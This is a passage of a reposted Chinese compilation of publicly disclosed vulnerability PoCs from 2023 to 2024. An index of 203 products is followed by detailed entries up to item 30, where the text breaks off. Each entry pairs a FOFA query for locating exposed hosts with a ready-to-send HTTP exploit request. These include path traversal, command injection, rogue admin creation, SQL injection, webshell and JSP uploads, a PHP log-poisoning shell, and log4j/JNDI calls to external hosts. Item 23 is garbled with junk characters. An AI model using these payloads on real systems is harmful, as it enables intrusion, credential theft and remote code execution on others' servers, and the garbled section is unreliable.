Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全, 2024-06-05 07:41, Beijing
The following article is from 网络安全新视界; author: 网络安全新视界.

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and we hope this article helps with defense. Defenders can use its contents to conduct risk checks.

Sources: This article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: All of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: Due to length constraints, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To simplify the process and make browsing easier, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).
Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-pass smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese Tosei self-service laundry machine RCE
87. DAS-Security (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DAS-Security 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan 建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian 科立迅 communications command and dispatch platform down_file.php SQL injection
138. Fujian 科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. Fujian 科立讯 communications command and dispatch platform editemedia.php SQL injection
140. Fujian 科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle location monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 全媒体 news editing system binary SQL injection
202. 微擎 system AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"

Change password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x


The payload is the double URL-encoding of the following statement

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie first
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request: the written function executes a base64-encoded command
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Send the following request to the lab target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function to compute the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
""
}


22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
* `& d; u8 U# Z  B- ~( a( W& zFOFA:icon_hash="-1935899595"/ o1 d  D5 r) x. q2 G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
: \5 j! u+ J* l% P; Q" }' Q8 M9 fHost: your-ip
6 ^8 F6 c0 n. k( \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: e# P% [4 J3 l5 K1 EContent-Type: application/json;charset=utf-8
" H2 x' O3 H2 W: {" \' uAccept-Encoding: gzip% a* z% ^  u" y: o- q
Connection: close
" D& l. o/ a$ ?0 e! Q9 i% E, z  f: o8 I3 s; ~
{& N: t" P$ v* @6 P8 R4 b( R' H
    "a":{
6 [" ^! i) g! Y7 \; S# B8 I        "@type":"com.alibaba.fastjson.JSONObject",- t; B! ~; ~; ^. i; [# I; t
       {"@type":"java.net.URL","val":"http://DNSLOG"}) w. T9 l+ k: S! |0 k$ }8 J6 E
        }""  `5 A# F7 t3 z) R9 w" K
}5 m. I' A7 m* v9 l, H& u

: `$ T1 e" g  n! R2 f1 a) T6 R8 [0 m+ ?: k9 N+ \
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
